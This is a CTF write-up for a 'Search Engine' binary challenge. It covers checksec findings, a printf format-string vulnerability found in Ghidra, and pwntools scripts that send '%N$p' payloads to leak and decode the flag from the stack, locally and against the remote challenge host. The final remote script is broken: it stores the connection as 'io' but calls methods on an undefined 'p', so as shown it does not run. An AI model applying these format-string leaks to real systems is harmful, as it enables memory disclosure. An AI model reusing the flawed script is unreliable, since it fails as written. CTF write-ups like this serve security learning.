Search Engine

Basic Executable Reconnaissance

the executable is not stripped which makes reverse engeneering easier because it doesnt hide function names and the executable is dynamically linked so the libc library which contains many external functions like fprintf() are not loaded within the executable but they dynamically linked at the execution time

we have two security configuration enabled.

PIE

PIE Position Independent Executable which means that every time you run the file it gets loaded into a different memory address. This means you cannot hardcode values such as function addresses and gadget locations without finding out where they are. But this does not mean it's impossible to exploit

NX

No-Execute also known as Data Execution Prevention or DEP marks certain areas of the program as not executable, meaning that stored input or data cannot be executed as code. This is significant because it prevents attackers from being able to jump to custom shellcode that they've stored on the stack or in a global variable.

checksec --file=search_engine

when we run the binary it asks to search for something and when i inputed google it reflected it in the last line so it maybe vulnerable to format string vulnerability let's check it using ghidra

and it's actually vulnerable to printf format string vulnerability

and now let's create a fuzzer script to leak 100 addresses from the stack

from pwn import *

# This will automatically get context arch, bits, os etc
elf = context.binary = ELF('./search_engine', checksec=False)

for i in range(100):
    try:
        # Create process (level used to reduce noise)
        p = process(level='error')
        # e.g. %2$s will attempt to print second pointer as string
        p.sendline('%{}$p'.format(i).encode())
        # Receive the response
        result = p.recvuntil(b'No result found. You searched for - ')
        result = p.recv()
        if not 'nil' in result.decode():
            print(str(i) + ': ' + str(result.decode()[2:]))
        
        # Exit the process
        p.close()
    except EOFError:
        pass

let's run this script and we can see that 10 to 14 contains ascii values but they are in little endianne so we have to decode them and reverse them

we will modify the script to fuzz only the values from 10 to 14 and decode, reverse each one of them, then add them together

from pwn import *

# This will automatically get context arch, bits, os etc
elf = context.binary = ELF('./search_engine', checksec=False)

flag = ''

for i in range(10,15):
    try:
        # Create process (level used to reduce noise)
        p = process(level='error')
        # e.g. %2$s will attempt to print second pointer as string
        p.sendline('%{}$p'.format(i).encode())
        # Receive the response
        result = p.recvuntil(b'No result found. You searched for - ')
        result = p.recv()
        if not 'nil' in result.decode():
            # convert from ascii to utf-8 (human readable characters)     
            decoded = unhex(result.strip().decode()[2:])
            #swap the endianness (reverse the decoded string)
            reversed = decoded.decode()[::-1]
            flag += reversed
            

        # Exit the process
        p.close()
    except EOFError:
        pass
# the flag
print(f"flag : {flag}")

let's run this script and we have obtained the flag locally

to do this remotly change

p = process() to p = remote(host, port)

and also the position of the ascii strings is not the same as the local one try to fuzz 100 addresses you will find that the ascii strings are in the range 12 to 15

so this will be the script for the remote server

from pwn import *

# This will automatically get context arch, bits, os etc
elf = context.binary = ELF('./search_engine', checksec=False)

flag = ''

for i in range(12,16):
    try:
        # Connect to server
        io = remote('searchengine.ctf.intigriti.io', 1337, level='warn')
        # e.g. %2$s will attempt to print second pointer as string
        p.sendline('%{}$p'.format(i).encode())
        # Receive the response
        result = p.recvuntil(b'No result found. You searched for - ')
        result = p.recv()
        if not 'nil' in result.decode():
            decoded = unhex(result.strip().decode()[2:])
            reversed = decoded.decode()[::-1]
            flag += reversed
            
        # Exit the process
        p.close()
    except EOFError:
        pass
print(f"flag : {flag}")

run this script and u will get the remote flag

Greetings from Sayonara

PreviousEasy Register NextENSA SICS CTF 2023

Last updated 1 year ago

Was this helpful?